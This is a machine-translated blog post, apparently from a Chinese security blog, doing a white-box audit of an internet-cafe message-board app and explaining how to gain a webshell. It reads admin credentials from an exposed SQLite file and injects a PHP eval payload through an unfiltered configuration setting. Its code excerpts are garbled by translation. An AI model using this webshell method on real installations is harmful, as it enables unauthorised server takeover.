Analysis on Yiyou message Book Vulnerability

0 × 01 Origin
Almost all the desktops in the Internet cafes near the home have a "customer message" shortcut, so I am curious to see if I can get Webshell as quickly as possible.
 
0 × 02 know yourself and know yourself
Analysis of a source code, the first of course is to set up its environment, baidu out of the easy travel official (http://bbs.stnts.com/) page to find that it is like the Internet technology, is a company that provides diskless solutions for Internet cafe customers. I was surprised to package the source code. It was a set of things similar to DeDeAPMz, and its Web Service chose Nginx. The directory structure is roughly as follows:
 
Code
\-EyooBoard
+-Cache
| \-Message
| +-Comic
| +-Default
| +-Music
| +-Tuya
| \-Undefined
+-Include
| +-Class
| \-Data
+-Module
| \-Message
+-Templates
| \-Default
+-Themes
| +-Comic
| +-Images
| +-Javascript
| \-Style
| \-Default
| +-Images
| \-Face
| +-Javascript
| \-Style
| \-Images
\-Under the uploadROOT directory, only index is available. php, In order to quickly find the vulnerability, of course, starts from the background, because once the Administrator has a weak password, the Webshell can be easily obtained in the background. If it doesn't matter, at least understand the verification method.
Index. php first introduced me to include/common. inc. php. Some of the Code is as follows:
 
Code
// Escape for sqlite
Ini_set ('Magic _ quotes_sybase ', 'on ');
 
// Perform the Addslash operation on user-passed Variables
/* If (! Get_magic_quotes_gpc ()){
Function addslashes_deep ($ value ){
$ Value = is_array ($ value )? Array_map ('addslashes _ deep ', $ value): addslashes ($ value );
Return $ value;
}
$ _ POST = array_map ('addslashes _ deep ', $ _ POST );
$ _ GET = array_map ('addslashes _ deep ', $ _ GET );
$ _ COOKIE = array_map ('addslashes _ deep ', $ _ COOKIE );
$ _ REQUEST = array_map ('addslashes _ deep ', $ _ REQUEST );
} */You can see that its annotation has escaped Sqlite. The popular combination is PHP + MySQL, which is very interesting. although he used ini_set to enable automatic escape, it can also be injected in some cases. For example, in the common search code, many programmers prefer to urlencode () the keyword, at this time, it will not be affected by automatic escape, and the following escape functions are also commented out manually.
Since it is SQLite, it must be a local library like Access. Now the battlefield is moved and the Data directory is found under include, where the Message is quietly lay down. db. There are many tools for browsing SQLite databases online. I recommend Multi DataBrowser, which supports browsing of multiple databases after configuration.
 
0 × 03 further expand the battlefield
Let's take a look at Login. Some code is as follows:
 
Code
Case "auth ":
$ Username = strtolower (post ('username '));
$ Password = post ('Password ');
$ Code = post ("code ");
If ($ code! = $ _ SESSION ["validationcode"])
{
Echo "CE"; // Error Code verification Code
Exit;
}
$ Info = $ db-> SelectS ("select id, password from systemuser where username = '". $ username. "'", 1 );
If (is_array ($ info )){
If ($ info ["password"] = md5 ($ password )){
$ Db-> query ("update systemuser set lasttime =". time (). "where username = '". $ username ."'");
$ _ SESSION ["___ isadmin"] = $ info ['id'];
Echo's '; // Success logon successful
// Msg ("Logon successful", "index. php? Mod = message & act = manage & do = set ");
}
Else {
Echo 'pe'; // Password Error: Incorrect Password www.2cto.com
}
} The input parameters are limited by single quotes, and ini_set cannot be injected. You can directly log on to the database by getting the password found in the database.
We know that the configuration file is written from one of the GetShell methods in the background. However, we must first find the location of the configuration file. Found from manage. inc. php
 
Code
......
$ Filename = "include/data/configure. data. php"
...... Omit irrelevant code
 
......
Case "setsave ":
$ Op = post ('op ');
Switch ($ op ){
Case 'system ':
$ Configcache = array (
'Pagesize' => post ("pagesize ")? Post ("pagesize"): $ CONFIGURE ["pagesize"],
'Board _ pagesize' => post ("board_pagesize ")? Post ("board_pagesize"): $ CONFIGURE ["board_pagesize"],
'Title' => post ("title ")? Post ("title"): $ CONFIGURE ["title"],
'Filter' => post ("filter ")? Explode ("|", post ("filter ")):"",
'Weather cityno' => post ("city "),
'Ipinterval' => post ("ipInterval "),
'Ischeck' => $ CONFIGURE ["ischeck"],
'Systemuser' => $ CONFIGURE ["systemuser"],
'Tp '=> $ CONFIGURE ['tp']
);
If (post ("city "))){
// If no city exists
WriteJsWeatherCache (post ("city"); // regenerate the weather js
// Jsfun ("set successfully ","? Mod = message "," top ");
}
Else {
$ Configcache ['Weather cityno'] = $ CONFIGURE ['Weather cityno'];
}
Break;
...... Let's take a look at the include/data/configure. data. php content. $ CONFIGURE = array is defined as an array, and all values are stored in this array. Looking back at the total content of manage. inc. php, without any filtering after the POST value, the value is directly assigned to the $ CONFIGURE array, so I am evil.
 
0 × 04 GetShell
In the background of ASP, we usually close single quotes and write a sentence to get Webshell. This is a special case. If we write eval ($ _ POST [cmd]) directly, it cannot be executed. I think of "talking about PHP variable security" recently released by eggplant Daniel, and I would like to thank the PHP programming features for giving us a more evil opportunity. Construction is similar to $ {$ {eval ($ _ POST [fuck])} the eval statement can be executed when the variable is written into the Array (For details, refer to PHP variable security.) Then, you only need to find the place to be called. Looking back at the usage in the ASP environment, you must directly access the file like config. asp, which is the address of a sentence, but unfortunately you can see the following content in configure. data. php:
If (! Defined ('in _ site') exit ('Access Denied ')
It is very common to prevent direct access, and it is easy to break through without enough. You can simply find a place to read the $ CONFIGURE array. After further reading the code, we found that the architecture is similar to MVC. In templates \ default \ top.htm, find the following content:
 
Code
<H1> <a ref = "index. php "title =" {$ CONFIGURE ["title"]} ">{$ CONFIGURE [" title "] }</a> Obviously, directly accessing index. php can make the eval function accept the value, and effectively bypasses the restriction of preventing direct access to script files.
 
0 × 05 postscript
After the goal is fixed, I googled it again and found that someone on the Internet has provided a Webshell method. There is also a small mistake here. In the penetration test process, when the target Web program is known, the existing vulnerabilities should be used for testing first, however, in the process of in-depth code reading, I also gained a lot.
In fact, there are a lot of interesting things in this system. The younger brother's experience in white box is still quite simple, so I need to talk more with you.

From DarkRay's BLoG .!